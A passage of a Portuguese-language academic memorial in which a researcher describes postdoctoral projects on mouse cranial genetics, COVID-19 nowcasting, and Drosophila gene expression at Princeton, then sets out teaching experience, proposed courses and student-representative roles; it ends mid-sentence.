Coloco esse relato nesta seção porque o trabalho com os crânios se tornou o projeto do meu primeiro pós-doutorado, cujo objetivo foi usar nossa colônia para investigar como a arquitetura genética se relaciona com o padrão de associações genéticas entre os traços do crânio. Como mencionei anteriormente, os dados cranianos permitem integrar este projeto com os outros resultados produzidos no LEM ao longo da última década, e explorar experimentalmente como as associações genéticas se estabelecem e evoluem num fenótipo complexo que teve sua história macroevolutiva amplamente estudada. Em 2020, três anos e meio após a chegada dos animais ao Brasil, finalmente concluímos a coleta dos fenótipos cranianos de todos os animais escaneados, possibilitando relacioná-los com os genótipos, a fim de identificar os loci responsáveis pela covariação no crânio.
O primeiro trabalho a usar o banco de dados dos crânios foi o projeto de iniciação da Amanda, que orientei durante o ano de 2019, quando somente a geração F6 havia sido medida. Amanda investigou a ligação entre a taxa de crescimento máxima observada nos animais da F6 com a sua integração#footnote[Uma medida da intensidade média das associações entre um conjunto de traços fenotípicos.] no crânio, duas variáveis que, quando medidas em diferentes espécies de mamíferos, aparecem positivamente correlacionadas numa escala macroevolutiva @Porto2013-dc. O objetivo do projeto da Amanda foi verificar se essa associação era movida por uma ligação mecanística entre as duas variáveis, podendo, portanto, ser observada dentro de uma população com variação em taxas de crescimento. Nossa população era ideal para esse objetivo, pois fora fundada por linhagens com diferenças grandes nas suas taxas de crescimento, estabelecidas por seleção artificial, e, portanto, apresentava muita variação em crescimento na geração F6. Esta pesquisa retomou uma das primeiras questões que eu e Gabriel nos colocamos ao começar o projeto conjunto com o Prof. <NAME>. Surpreendentemente, a relação entre taxa de crescimento e a integração era inversa ao observado na comparação entre espécies. Animais com taxas de crescimento mais altas se mostraram menos integrados que animais com a taxa de crescimento mais baixa. Apesar de não confirmar nossa hipótese inicial, esse resultado mostra uma ligação entre essas duas variáveis que ainda pretendemos explorar mais a fundo, com o objetivo de entender qual a consequência dessa associação para a evolução de curto prazo da covariação craniana. A orientação da Amanda envolveu um longo estudo de estatística, e ao final ela foi capaz de entender e interpretar o modelo Bayesiano de análise que construímos juntos. Apesar de ser um problema bem específico, as técnicas que utilizamos têm aplicação geral e podem ser usadas para analisar diversos tipos de dados experimentais.
No início de 2020, antes das medidas de contenção ocasionadas pela pandemia de covid-19, me dediquei a consolidar e fazer um controle de qualidade em todos os dados fenotípicos e genotípicos da colônia que construímos durante o meu projeto de doutorado. Uma das vantagens da coleta de fenótipos cranianos usando o microtomógrafo é a que, depois de medir manualmente todos os indivíduos usando as imagens digitalizadas, é possível voltar e encontrar erros e inconsistências nas medidas, que podem assim ser corrigidas. Por ser um processo muito trabalhoso, poucos grupos de pesquisa dedicam o tempo e cuidado necessários para produzir um banco de dados robusto e com o menor erro de medida possível. Mas acredito que, quando estamos tratando de medidas que podem ter uma fração de milímetro, esse cuidado é crucial para termos confiança nas análises. Para isso, desenvolvi um protocolo de verificação das medidas de crânio que permite detectar erros de medida muito pequenos, e utilizando-o, produzi um conjunto de medidas muito precisas e acuradas da variação craniana desses animais. Esse protocolo foi aplicado a todos os animais escaneados, e os dados foram consolidados e organizados em um banco de dados que pode ser usado para uma série de projetos futuros.
Em paralelo a isso, o Prof. <NAME> começou a trabalhar com técnicas de marcação automática das imagens de microtomógrafo utilizando métodos de aprendizado de máquina. Esses métodos permitem que, ao invés de medir manualmente os crânios, possamos usar um algoritmo para fazer as medidas automaticamente. Neste projeto, Arthur conseguiu desenvolver um algoritmo que mede automaticamente todos os pontos no crânio, e que pode ser usado para medir os crânios de todos os animais da colônia. O meu conjunto de dados, sendo de uma escala e qualidade inéditas, é ideal para o desenvolvimentoe validação das técnicas de medidas automáticas como essas. Assim, estabelecemos uma colaboração promissora, que permitirá entender exatamente quais são as diferenças entre as medidas tradicionais e automáticas e suas consequências.
Hoje, sou o único pesquisador explorando ativamente os dados genéticos e fenotípicos da nossa colônia e, além das discussões com o Prof. Gabriel, mantenho contato com o Prof. Jason e os outros pesquisadores envolvidos no projeto inicial: <NAME>, atualmente na Universidade de Bristol no Reino Unido, e o Prof. <NAME>, da Universidade de Exeter no Reino Unido. Esse banco de dados consolidado fornece um substrato rico para o estudo de arquitetura genética, covariação e a interação com processos microevolutivos, e, portanto, viabiliza uma série de projetos com perguntas específicas.
Alguns desses projetos já estão em andamento, como o de mapeamento da arquitetura genética e identificação de genes pleiotrópicos nos fenótipos de crescimento e cranianos, quantificação da relação entre arquitetura genética e covariação, ligação da arquitetura genética na população experimental com a história evolutiva dos fundadores, e a elucidação da base mecanística da ligação entre intensidade de integração e crescimento. Podemos utilizar nossos dados, aliados aos dados comparativos acumulados no LEM ao longo dos anos, para entender como se dá a ligação entre a micro e macroevolução de fenótipos morfológicos. Essa colônia permite também quantificar a contribuição de efeitos maternos para a variação em todos os fenótipos medidos, e entender as consequências evolutivas dessa variação via efeitos indiretos. Além disso, podemos desenvolver métodos novos para o mapeamento genético de fenótipos de alta dimensão e explorar o padrão de herança da variação craniana. O tempo e esforço despendidos na produção desse banco de dados são certamente refletidos nas possibilidades de avanço do conhecimento que ele proporciona.
Além do meu projeto com os camundongos, durante meu período de pós-doutorado, continuei com as colaborações com outros membros egressos do laboratório. Destaco dois trabalhos desenvolvidos principalmente com os Profs. <NAME>, da Oklahoma State University (OSU), e Prof. <NAME>, da Universidade Federal da Bahia, entre outros colaboradores. Nestes trabalhos, nos debruçamos novamente sobre as consequências evolutivas da covariação em crânios de primatas, focando em diferenças metodológicas na medida da covariação entre caracteres morfológicos @Machado2019-af, e na influência do processo de desenvolvimento na manutenção dos padrões de covariação ao longo da vida dos indivíduos de diversos grupos de mamíferos @Hubbe2022-xb. Novamente, participei desenvolvendo toda a parte estatística e metodológica, continuando o com o padrão de colaborações que estabeleci durante o doutorado.
== A Pandemia e o Observatório Covid-19 BR
Em março de 2020, após finalizar a coleta de dados que descrevi acima, fui convidado pelo Prof. <NAME> a participar de um projeto de modelagem epidemiológica que ele estava coordenando, o Observatório Covid-19 BR#footnote[#link("https://covid19br.github.io/")]. O objetivo do projeto era produzir projeções de curto prazo para a evolução da pandemia da covid-19 no Brasil, usando modelos epidemiológicos e dados de internações por sindrome respiratória aguda grave do SIVEP-GRIPE#footnote[#link("http://info.gripe.fiocruz.br/")] e posteriormente do eSUS notifica#footnote[#link("https://datasus.saude.gov.br/notifica/")]. O projeto era uma colaboração entre pesquisadores do Departamento de Ecologia do IB-USP, do Instituto de Física Teórica da UNESP, do Departamento de Matemática da Universidade Federal do ABC e de dezenas de outras universidades e institutos em vários países#footnote[#link("https://covid19br.github.io/sobre")]. O projeto foi um sucesso, e as projeções do Observatório Covid-19 BR foram amplamente divulgadas na mídia e utilizadas por diversos órgãos públicos e privados para planejar ações de combate à pandemia. Minha participação foi centrada no desenvolvimento de métodos para a estimação de parâmetros epidemiológicos a partir dos dados de internações, e na análise dos dados de internações para entender a dinâmica da pandemia no Brasil. Sem nenhum tipo de tratamento estatístico, os dados de internação fornecem uma visão da pandemia que pode estar até 40 dias fora de compasso com a realidade. O principal produto do Observatório do qual que participei diretamente foi um conjunto de métodos para _nowcasting_, ou seja, entender o estado atual da pandemia corrigindo para o problema do atraso na atualização dos dados.
== Ayroles Lab
Durante o doutorado e pós-doc na USP, estabeleci uma colaboração independente com o laboratório do Prof. <NAME> na Universidade de Princeton nos Estados Unidos. O Prof. Julien lidera um grupo de pesquisa em genética, utilizando, entre outros modelos, uma colônia grande e diversa de _Drosophila melanogaster_, com foco em investigar interações epistáticas entre genes. O laboratório do Prof. Julien utiliza mapeamento genético, técnicas modernas de medição de fenótipos em larga escala, e outras técnicas de biologia de sistemas e genética quantitativa para entender a arquitetura genética por trás da variação em diversos tipos de fenótipos, tais como expressão gênica, morfologia, ou mesmo comportamentos. A colaboração com esse grupo me permite investigar aspectos da arquitetura genética que exigem amostras maiores do que seria viável com camundongos, como a influência da epistasia na covariação, interações entre fenótipo e ambiente, ou a covariação entre a expressão de vários genes simultaneamente. Como resultado dessa colaboração, no final de 2019, eu e o Prof. Ayroles decidimos submeter uma proposta para uma bolsa de pós-doutorado em Princeton, a _Princeton Presidential Postdoctoral Research Fellowship_. Assim, em julho de 2020 passei a integrar o grupo do Ayroles Lab. Minha contribuição para o grupo tem sido trazer uma visão que vá além da variação em cada traço independentemente, focando em fenótipos multivariados e seu padrão de covariação. Essa abordagem multivariada permite estudar dinâmicas genéticas e evolutivas mais complexas, que revelam consequências impossíveis de acessar quando se investiga um traço de cada vez. Durante os cerca de 3 anos em Princeton, me envolvi em diversos projetos, que detalho abaixo.
=== Contribuição da epistasia à resposta adaptativa
Enfrentei um desafio inicial nessa nova etapa de minha carreira: a impossibilidade de me mudar para Princeton devido às restrições na emissão de vistos americanos, uma consequência da pandemia. Isso me levou a participar de projetos em andamento no laboratório do Prof. Ayroles. Estabeleci minha primeira colaboração com o Dr. <NAME>, um pós-doutorando focado em entender o impacto da epistasia - a interação entre dois ou mais loci genéticos - na evolução de características complexas. A epistasia, sendo um elemento crucial na arquitetura genética dessas características, é desafiadora de estudar devido à necessidade de grandes números amostrais para ser detectada com confiança.
Simon analisava dados de um experimento _Evolve & Resequence_#footnote[Em experimentos de E&R, uma população é exposta a uma pressão ambiental e tem suas frequências alélicas acompanhadas por sequenciamento a medida que se adapta ao novo ambiente.], envolvendo uma população _outbred_#footnote[Geneticamente variável, em oposição às linhagens homozigotas normalmente utilizadas na pesquisa com _D. melanogaster_.] de _D. melanogaster_. A adaptação evolutiva, acreditamos, resulta da interação entre varreduras seletivas - variantes vantajosas que se tornam prevalentes rapidamente - e mudanças mais sutis em muitos loci, dependendo da arquitetura genética das características selecionadas.
No experimento, as moscas foram submetidas a dietas controle padrão e a dietas ricas em açúcar, introduzido como estresse ambiental, por mais de 100 gerações. Monitoramos as alterações na frequência alélica em mais de 4.000 moscas, identificando loci sob seleção. Os resultados apontaram que aproximadamente 4% do genoma estava sob seleção positiva, numa resposta majoritariamente poligênica. A maioria dos loci selecionados não indicava varreduras seletivas fortes, mas sim mudanças sutis na frequência alélica, alinhando-se a uma resposta poligênica. Identificamos também loci que evidenciavam epistasia, com mudanças na frequência alélica de um locus dependendo de outro, além de um padrão de desequilíbrio de ligação ao final do experimento.
Além de contribuir para a análise de dados, nesse projeto apliquei novamente a combinação de teoria, experimentos e simulações. Desenvolvi um modelo computacional que reproduzia nosso desenho experimental, avaliando a contribuição da epistasia para as mudanças nas frequências alélicas e no desequilíbrio de ligação. Comparando arquiteturas genéticas aditivas e epistáticas, demonstrei que apenas a epistasia explicava os padrões observados no experimento. Esses achados sugerem que a epistasia é um componente crucial na resposta evolutiva, e que as respostas poligênicas podem ser mais comuns do que se supunha anteriormente.
Apresentei esse trabalho no congresso da _Society for Molecular Biology & Evolution_, o SMBE2023, e na _Gordon Research Conference for Ecological and Evolutionary Genomics_ 2023.
=== Mapeamento de eQTLs em D. Melanogaster
O próximo projeto que enfrentei no Ayroles lab foi feito em colaboração com a Prof. <NAME>, na época pós-doutoranda e hoje professora do Max Plank de Biologia em Tübingen, na Alemanha. Nosso projeto visava trazer para Drosófila o tipo de catálogo de variantes que regulam expressão gênica disponível em outros organismos, como humanos e leveduras. Drosófila é um modelo para o qual a grande maioria do mapeamento genético é feito utilizando painéis de linhagens homozigotas, como o DGRP @Mackay2012-ee ou o DSPR @Long2014-uf. Esses painéis são muito úteis para mapear efeitos aditivos, mas não permitem a detecção de efeitos de dominância ou epistáticos, fundamentais para entender os padrões complexos de interação entre loci diferentes. Para isso, é necessária uma população _outbred_, que é muito mais difícil de analisar, pois exige que todos os indivíduos num experimento sejam genotipados. O uso de uma população _outbred_ geneticamente variável faz com que o poder estatístico não seja limitado pelo número de linhagens homozigotas disponíveis num dado painel. Ao contrário, podemos simplesmente amostrar quantos indivíduos forem necessários para um determinado experimento. Utilizando uma população de Drosófila geneticamente variável batizada de NEX, criada com o cruzamento de linhagens selvagens coletadas na Holanda, nós coletamos dados genéticos e de expressão gênica de mais de 1800 indivíduos, e mapeamos loci regulatórios de expressão (eQTLs) para mais de 5.000 genes. Com essa amostra inédita, foi possível mapear eQTLs em cis e trans para 98% dos genes expressos em D. melanogaster, aumentando em milhares o número de genes para os quais os loci regulatórios são conhecidos nesta espécie. Pela primeira vez, no contexto de uma população geneticamente variável, foram descritas as propriedades da regulação local e distal da expressão gênica em termos de diversidade genética, herdabilidade, conectividade e pleiotropia. Esses resultados elevam o entendimento da mosca-da-fruta a um nível que antes estava disponível apenas para poucos outros organismos, oferecendo um novo recurso de mapeamento que ampliará as possibilidades atualmente disponíveis para a comunidade de Drosófila. Estes recursos estão disponíveis em #link("https://drosophilaeqtl.org/") e o trabalho está disponível hoje como _pre-prints_ @Pallares2023-eh @Wolf2023-bb.
=== Modularidade em redes de co-expressão gênica
Um dos aspectos que mais me interessavam no trabalho com Luisa era o padrão de co-expressão gênica. O efeito fenotípico da expressão de um gene não é determinado num vácuo, mas depende do nível de expressão de outros genes. Essa relação de dependência com outros genes faz com que o nível ótimo de expressão de um gene seja determinada pela expressão de outros. O balanço entre a expressão de todos os genes num organismo leva a um determinado padrão de co-expressão, que pode ser capturado a partir das correlações entre os níveis de expressão genética entre indivíduos. Nós estimamos essas correlações entre os nives de expressão nos genes expressos na NEX, nossa população _outbred_ de Drosófila. Trazendo minha experiência em covariação e sistemas multivariados, procurei identificar grupos de genes com padrões similares de expressão, os módulos de co-expressão. Esses módulos são caracterizados pelas suas associações preferenciais, ou seja, genes em um mesmo grupo estão mais associados entre si do que com genes em outros módulos. Identificar esses módulos é um passo importante para reduzir a dimensionalidade da representação do transcriptoma, e permitir que a própria organização variacional do sistema informe os grupos de genes de interesse, que, por sua vez, podem ser analisados separadamente, ou articulados para interpretar o padrão de regulação gênica.
Contudo, as ferramentas disponíveis na literatura não lidaram bem com o volume de dados do nosso experimento, resultando em agrupamentos pouco informativos e que excluíam a enorme maioria dos genes analisados. Procurando sanar esse problema, busquei inspiração na literatura de redes complexas, que nos levou a uma percepção importante: tradicionalmente, algoritmos de detecção de comunidades pressupõem que os genes estejam organizados em módulos com associações preferenciais. Contudo, essa abordagem pode ser arriscada, pois presume a existência desses módulos _a priori_, ignorando outras organizações possível das redes de co-expressão. Nos perguntamos, então, se seria possível encontrar comunidades biologicamente significativas sem impor uma organização modular às redes de co-expressão gênica, buscando esses blocos de genes por meio de uma medida de similaridade mais genérica. Para isso, adaptamos um método moderno de detecção de comunidades, os _Stochastic Block Models_ (SBM), que não pressupõe a existência de módulos com associações preferenciais. Em vez disso, essa classe de modelos busca utilizar toda a informação contida na rede de co-expressão para separar os genes em blocos hierarquicamente organizados.
Utilizando dados de expressão gênica de RNA-seq medidos em dois tecidos derivados de uma população heterogênea de Drosophila melanogaster, os mostramos que: (a) o SBM consegue identificar dez vezes mais grupos do que métodos concorrentes, além de separar todos os genes em grupos (contra 10% nos métodos usuais); (b) vários desses grupos gênicos não são modulares, ou seja, os genes dentro de um grupo não são mais associados entre si do que com outros grupos, apesar de terem claro enriquecimento funcional para processos biológicos específicos; e (c) o enriquecimento funcional para grupos não modulares é tão forte quanto para grupos modulares. Esses achados indicam que o transcriptoma é estruturado de maneiras mais complexas do que se pensava anteriormente e sugerem a necessidade de revisar a suposição de que a modularidade é o principal fator na estruturação de redes de co-expressão gênica. Esse trabalho está disponível hoje como _pre-print_ @Melo2023-ij.
=== Variabilidade da expressão gênica em humanos
Uma linha de pesquisa importante no Ayroles Lab é o estudo de interações genótipo ambiente em humanos, especialmente no contexto de incompatibilidades genótipo ambiente, no qual populações humanas adaptadas a um ambiente são expostas a novas condições ambientais, seja por migração ou por mudanças no hábito de vida. Nesse contexto, uma pergunta fundamental é a variabilidade basal na expressão gênica em humanos. Existem genes com expressão mais ou menos variável, independente do ambiente? Ou a variabilidade em expressão gênica é completamente contexto dependente? Para abordar esse problema, em colaboração com um aluno de doutorado no laboratório, <NAME>, utilizamos conjuntos de dados de RNA-seq disponíveis publicamente para investigar a paisagem da variação na expressão gênica. Scott e eu levantamos mais de 50 estudos, abarcando mais de 20 mil medidas de expressão gênica. Esses dados abrangem uma variedade de tecidos e permitem avaliar se existem genes consistentemente mais ou menos variáveis entre os tecidos e conjuntos de dados, bem como os mecanismos que impulsionam esses padrões.
Os resultados mostram que a variação na expressão gênica é relativamente semelhante entre diferentes tecidos e estudos, indicando que o padrão de variação da transcrição é consistente. A partir desta semelhança, criamos rankings globais e específicos para cada tecido de variação, demonstrando que a função do gene, variação de sequência e assinaturas regulatórias de genes contribuem para a variação na expressão gênica. A criação desses rankings globais só foi possível devido à minha experiência em lidar com dados multivariados, pois nós nos valemos das técnicas matemáticas usadas na genética quantitativa para desenvolver nosso método de ranqueamento global. Com esse ranking, mostramos que os genes de baixa variação estão associados a processos celulares fundamentais, possuem menores níveis de polimorfismos genéticos, maior conectividade gene-gene, e tendem a estar relacionados a estados de cromatina associados à transcrição. Por outro lado, genes de alta variação são enriquecidos em genes envolvidos na resposta imune e genes responsivos ao ambiente, e estão associados a níveis mais elevados de polimorfismos.
Esses resultados revelam que o padrão de variação da transcrição não é um ruído aleatório, mas sim uma característica gênica consistente que parece ser funcionalmente restrita em populações humanas. Além disso, esse aspecto comumente negligenciado da variação fenotípica molecular contém informações importantes para entender traços complexos e doenças. Esse trabalho foi publicado em #cite(<Wolf2023-zw>, form: "prose"), artigo em que apareço como co-primeiro autor.
= Projetos em andamento e próximos passos
Na biologia contemporânea, a geração de conjuntos de dados deixou de ser o principal desafio. Com o avanço das tecnologias de sequenciamento de DNA e RNA, e de outras técnicas de alta precisão, a quantidade de dados genômicos e de fenótipos moleculares disponíveis cresceu exponencialmente. Este acúmulo de informações, embora seja um marco importante, trouxe uma complexidade sem precedentes na análise e compreensão dos dados. A única forma de lidar com essa complexidade é uma abordagem integrativa, que combine teoria, experimentos e análises computacionais. Acredito que minha formação e experiência me permitem contribuir com essa abordagem integrativa, e que o Instituto de Biociências da USP é o lugar ideal para desenvolver essa linha de pesquisa, porque possui uma sólida reputação na pesquisa interdisciplinar e oferece uma ampla gama de recursos, colaborações e expertise necessários para enfrentar os desafios da análise de dados genômicos e fenotípicos de maneira integrada. Uma percepção importante é a quantidade de _insight_ biológico acumulado nos anos de pesquisa em evolução morfológica e na ampla teoria de genética quantitativa desenvolvida no seculo XX. De fato, uma espécie de redescobrimento da genética quantitativa foi um dos artigos mais influentes dos últimos anos @Boyle2017-jh, destacando como muitas variantes de pequenos efeitos podem interagir para produzir fenótipos complexos. A genética quantitativa evolutiva é uma ferramenta poderosa para entender e esmiuçar a arquitetura genética de fenótipos complexos.
Nos últimos anos do meu pós-doutorado, meu foco foi em estabelecer uma linha de pesquisa independente, focada em levar nosso entendimento de redes de co-expressão gênica para um novo patamar. Para isso, estabeleci colaborações com grupos de pesquisa experimentais de ponta, como o laboratório do Prof. Ayroles em Princeton, e o laboratório da Prof. Pallares em Tübingen, entre outros que já descrevi aqui. Essas colaborações internacionais me permitiram desenvolver projetos em uma escala que não seria possível no contexto brasileiro. Atualmente, estamos construindo um conjunto de dados que usa experimentos de seleção natural no laboratório, expondo populações a um estresse ambiental por muitas gerações, e experimentos de exposição aguda, onde uma população é exposta ao estresse por apenas uma geração. Cada um desses experimentos envolve dezenas de milhares de indivíduos, e milhares de genomas e transcriptomas. Esse tipo de experimento nos permite entender como a resposta de curto prazo, plástica, e a resposta de longo prazo, adaptativa, estão relacionadas. O meu interesse nesses experimentos é entender como a co-expressão gênica se relaciona com a resposta adaptativa, e como a epistasia influencia essa relação. Nós já mostramos como a co-expressão pode ter estruturas diferentes dependendo do contexto @Melo2023-ij, e agora queremos entender como essa alteração se relaciona com a resposta adaptativa e plástica, e com a arquitetura genética da regulação gênica. O desenvolvimento de novos métodos para a análise de co-expressão certamente será fundamental para que o conhecimento gerado nesses projetos leve a um entendimento mais profundo dos mecanismos de regulação e adaptação relacionados à expressão gênica. No cerne desses projetos está a ideia de que mudanças no padrão de associação entre caracteres é uma ferramenta integradora poderosa para prever e interpretar a resposta de populações naturais a perturbações ambientais. Essa ideia pode ainda ser usada para aprofundar nosso entendimento da progressão de doenças humanas, nas quais a degradação do padrão homeostático de associação entre a expressão de genes funciona como um indicador de estados patológicos @Lea2019-pq.
Continuo também com meu trabalho relacionado a arquitetura genética de caracteres morfológicos, com consequências importantes para o melhoramento animal e para a compreensão do processo macro-evolutivo. Para isso, utilizo os dados que coletei durante meu doutorado, descritos acima, e continuo com colaborações com outros grupos interessados em problemas macro-evolutivos, como o laboratório do Prof. <NAME>, curador da coleção de mamíferos na OSU, e o Prof. <NAME>, do Departamento de Genética e Biologia Evolutiva do IB-USP. Continuo desenvolvendo métodos para a análise de covariação e arquitetura genética, e aplicando esses métodos aos dados que coletei. A teoria de efeitos genéticos em caracteres multivariados e as técnicas estatísticas de detecção desses efeitos são áreas ainda pouco desenvolvidas, e que podem ser muito frutíferas para a compreensão da evolução de caracteres complexos, com aplicações na genética de doenças humanas.
A construção desses conjuntos de dados e as colaborações já estabelecidas, além da experiência computacional, tanto com simulações quanto análises customizadas, me permitem continuar desenvolvendo uma linha de pesquisa de ponta e original, que procura entender a relação entre arquitetura genética, covariação e evolução multivariada. Essa linha de pesquisa se encaixa bem na estrutura do Instituto de Biociências, contribuindo com uma visão integrativa que liga os processos genéticos aos processos evolutivos e que pode ser instrumental para as outras linhas de pesquisa. Além disso, os métodos estatísticos que uso e desenvolvo são relevantes para a genética humana, especialmente as técnicas modernas de mapeamento genético aplicadas à elucidação da arquitetura genética de caracteres complexos. Essas contribuições teóricas e metodológicas poderiam se dar não apenas por meio de colaborações com os outros docentes do instituto, mas também oferecendo disciplinas que irão treinar os alunos em teoria evolutiva ou nos métodos estatísticos, como detalho a seguir.
= Ensino
Durante minha trajetória acadêmica, sempre procurei dedicar tempo ao ensino, seja contribuindo como monitor em disciplinas de graduação e pós-graduação ou oferecendo disciplinas, cursos e _workshops_. Como já mencionei, as monitorias foram muito importantes na minha formação, me permitindo ter contato com áreas e métodos diferentes daqueles com que eu trabalhava no laboratório. Acredito que essas experiências foram cruciais para me proporcionar uma visão holística e integrativa de perguntas biológicas, expandindo minha visão para além das escalas do organismo e das populações que me são mais familiares. Participei como monitor de várias disciplinas do Departamento de Ecologia do IB, como a de programação em R, a de modelos estatísticos e, talvez a experiência mais formadora, o Curso de Campo da Mata Atlântica, organizado pelos Profs. <NAME>, <NAME> e <NAME>.
No curso de campo, levamos 20 alunos de mestrado para uma reserva ecológica em Barra do Una, ao sul de Peruíbe. Lá, sem acesso à internet ou sinal de celular, os alunos desenvolvem uma série de pequenos projetos de pesquisa e produzem manuscritos, que são revisados pelos professores e monitores. Ao longo de um mês, cada aluno participa de quatro projetos em grupo, que são propostos pela equipe da disciplina. Cada aluno também idealiza e executa um projeto individual, que é aprovado pela equipe de professores. Cada projeto é orientado por um professor convidado ou um monitor. É um curso muito intenso de desenho experimental, coleta e análise de dados, escrita e apresentação científica. Na edição em que participei, em 2015, apenas o professor Glauco, eu e um outro monitor passamos os 30 dias acompanhando os alunos, enquanto os outros professores e convidados passavam tipicamente uma semana de cada vez. Para mim, foi como uma experiência de orientação condensada, pois ajudei a produzir um total de 40 pequenos manuscritos, com até 5 revisões cada um. Aprendi muito sobre como revisar um texto, como orientar projetos num ambiente de alta pressão e como incentivar os alunos a fazerem o melhor trabalho possível. Foi um processo difícil para mim, no qual aprendi muito, tanto acertando, quanto errando. O momento mais desafiador do curso foi ajudar os alunos nos seus projetos individuais, já que eram 20 alunos produzindo projetos independentes, todos procurando orientação e ajuda com a teoria, análise e interpretação dos seus resultados. A demanda cognitiva de pensar e interpretar 20 projetos simultaneamente não é pequena, mas este foi um momento formativo para mim.
Contribuí também com as disciplinas da Genética, atuando como monitor da disciplina de Biologia Evolutiva ao longo de vários anos, tendo escrito com a Dra. <NAME> uma apostila para a disciplina#footnote[#link("https://github.com/lem-usp/apostila-bio-evol/blob/master/apostila-Bio312.pdf?raw=true").]. Também produzi todo o material de aula prática em R#footnote[#link("https://diogro.github.io/BioEvol/").] para a Biologia Evolutiva. Também fui monitor PAE da disciplina de Processos Evolutivos duas vezes ao longo da minha pós-graduação.
Durante o pós-doutorado na USP, ofereci uma disciplina de pós-graduação com a Dra. Monique Simon no Programa de Pós-Graduação em Biologia Comparada da FFCLRP-USP, em Ribeirão Preto, na qual apresentamos uma introdução à modularidade e teoria evolutiva e ligamos esses formalismos com suas consequências práticas. A disciplina conta com aulas teóricas e práticas e já foi oferecida duas vezes, em 2017 e 2019. Também estive envolvido, junto com vários pós-doutorandos de todos os departamentos do IB, numa disciplina prática de escrita científica. Apesar de ser uma das atividades mais frequentes e importantes da carreira científica, temos muito pouco treino objetivo de escrita durante a pós-graduação. Isso é uma pena, já que a escrita é a principal ferramenta de disseminação do conhecimento produzido em nossos laboratórios. Percebendo isso, dediquei um tempo considerável de estudo a aprimorar minha escrita em inglês, focando na escrita de artigos e projetos. Nossa disciplina apresenta aos alunos maneiras de pensar a escrita científica e oferece métodos para que eles possam elaborar textos claros e cativantes.
Já em Princeton, participei como monitor de uma disciplina de Genética Humana, Bioinformática, e Biologia Evolutiva, ministrada pelos professores <NAME>, <NAME> e <NAME>; e de uma disciplina de Epidemiologia, ministrada pelo Dr. <NAME>, para a qual minha experiência no Observatório Covid-19 BR foi fundamental. No último ano, fui também responsável por desenvolver e ministrar uma disciplina de Computação para Biologia, que apresentava aos alunos de graduação de diversos departamentos os principais conceitos de programação e análise de dados em R e Python, com um foco na pesquisa em ecologia e genômica.
Além do ensino em Princeton, mantenho minha dedicação a em formar alunos no Brasil participando do Programa de Formação em Ecologia Quantitativa#footnote[#link("https://serrapilheira.org/programa-de-formacao-em-ecologia-quantitativa/")], uma iniciativa do Instituto Serrapilheira que visa capacitar alunos de mestrado em métodos quantitativos modernos. Participei como instrutor de um curso de Modelagem Estatística, organizado em 2023 pelo Prof. <NAME>. Nesse curso, apresentei aos alunos os principais conceitos de modelagem estatística, com foco em modelos lineares e generalizados, e mostrei como implementar esses modelos na prática. A partir de 2024, eu assumo a coordenação desse curso de modelagem estatística, em parceria com a Dr. <NAME>, da _Re.Green_#footnote[#link("https://re.green/")], uma ONG focada em conservação.
Com base nessas experiências didáticas, entendo que um bom curso de graduação ou de pós-graduação deveria oferecer as ferramentas para que os alunos possam se tornar capazes de idealizar, analisar e interpretar seus dados e experimentos de forma independente. Para isso, é fundamental oferecer tanto disciplinas instrumentais quanto teóricas. Nesse contexto, apresento algumas propostas de contribuições que poderia fornecer ao departamento, buscando proporcionar aos alunos do IB e da USP a melhor formação possível, voltada para o pensamento crítico, independência e rigor científico.
== Teoria evolutiva
Das disciplinas de graduação atualmente oferecidas pelo IB, as que eu gostaria de ministrar seriam aquelas que envolvem ensino de evolução, como Processos Evolutivos, Biologia Evolutiva, Abordagens Multidisciplinares em Genética, ou uma das disciplinas de Genética e Evolução. Poderia também contribuir com a disciplina de Introdução à Programação de Computadores para Biologia ou a Introdução à Bioinformática, apresantando conceitos modernos em biologia de sistemas e bioinformática.
Como disciplina eletiva, eu ofereceria uma disciplina de Teoria Evolutiva, apresentando de forma mais profunda os fundamentos teóricos da biologia evolutiva, abordando não só as formulações tradicionais em termos de frequências alélicas de Fisher e Wright, mas também as formulações modernas como o Teorema de Price ou a genética quantitativa multivariada e as aplicações destes formalismos, como melhoramento animal, mapeamento genético e estudos evolutivos em populações naturais. Numa versão avançada para a pós-graduação, uma disciplina de teoria evolutiva poderia abordar também seleção multinível, modelos de manutenção da variação genética e eventualmente, para alunos com algum conhecimento de cálculo, até mesmo a formulação usando equações diferenciais parciais da evolução de frequências alélicas iniciada por Kimura.
== Estatística na era da computação
Outra contribuição que eu poderia oferecer na graduação ou na pós-graduação seria uma disciplina de análise de dados utilizando ferramentas computacionais modernas e modelos Bayesianos aplicadas a problemas biológicos. Na pós-graduação, essa disciplina poderia ser planejada em conjunto com as disciplinas de programação em R e modelagem estatística do Departamento de Ecologia, fornecendo aos alunos de pós do IB um caminho completo para uma formação moderna e adaptável em métodos estatísticos que os capacita para realizarem suas pesquisas com maior autonomia. Uma vantagem de oferecer esse tipo de disciplina no Instituto de Biociências é poder enfatizar aplicações em genômica, como mapeamento genético, modelos evolutivos e demográficos, e métodos de análise de transcriptomas, que não figuram nos cursos da tradicionais. Esses métodos estatísticos computacionais e de bioinformática são cada vez mais relevantes na biologia, com a disseminação de dados genômicos de larga escala que exigem análises sofisticadas e específicas.
= Atividades administrativas
Desde o mestrado, tive uma participação constante como representante discente (RD) em diversas comissões dentro do IB. Minha entrada nesse aspecto da vida na universidade não se deu por uma vocação para participar de atividades administrativas nem por um interesse pela política universitária, mas pela percepção pragmática de que alguém tinha que fazer esse papel. Uma colega da graduação envolvida com o centro acadêmico, a <NAME>, me convidou para ser candidato a RD na Congregação do IB, pois ela achava que eu poderia ser um bom representante, mas, principalmente, porque não havia outros candidatos interessados. Então, sabendo que ninguém mais o faria, aceitei o convite.
Participar da Congregação acabou sendo muito informativo, pois pude ver de perto como a universidade funcionava e como os professores navegavam a política universitária. Foi nesse momento que percebi as consequências concretas que a administração universitária tem para os alunos, professores e para as atividades fim da universidade. No meu primeiro mandato como RD na Congregação, pude acompanhar de perto a importância da representação discente como mecanismo de interlocução entre estudantes, docentes e as instâncias administrativas. Por exemplo, me lembro de um caso em que dois alunos tinham demandas essencialmente idênticas (uma extensão de prazo de algum tipo), mas um dos alunos contatou os RDs e explicou o motivo de seu pedido, enquanto o outro apenas enviou os requerimentos necessários. O primeiro teve a sua demanda atendida, o segundo não. A percepção da importância dessa atividade fez com que, depois dessa primeira experiência, eu continuasse atuando como RD em diversas comissões ao longo de toda a pós-graduação. No mestrado, além da Congregação, participei também como RD na Comissão de Pós-Graduação. Já no doutorado, participei novamente da Congregação e da Comissão de Pós-Graduação, depois fui eleito para a Comissão de 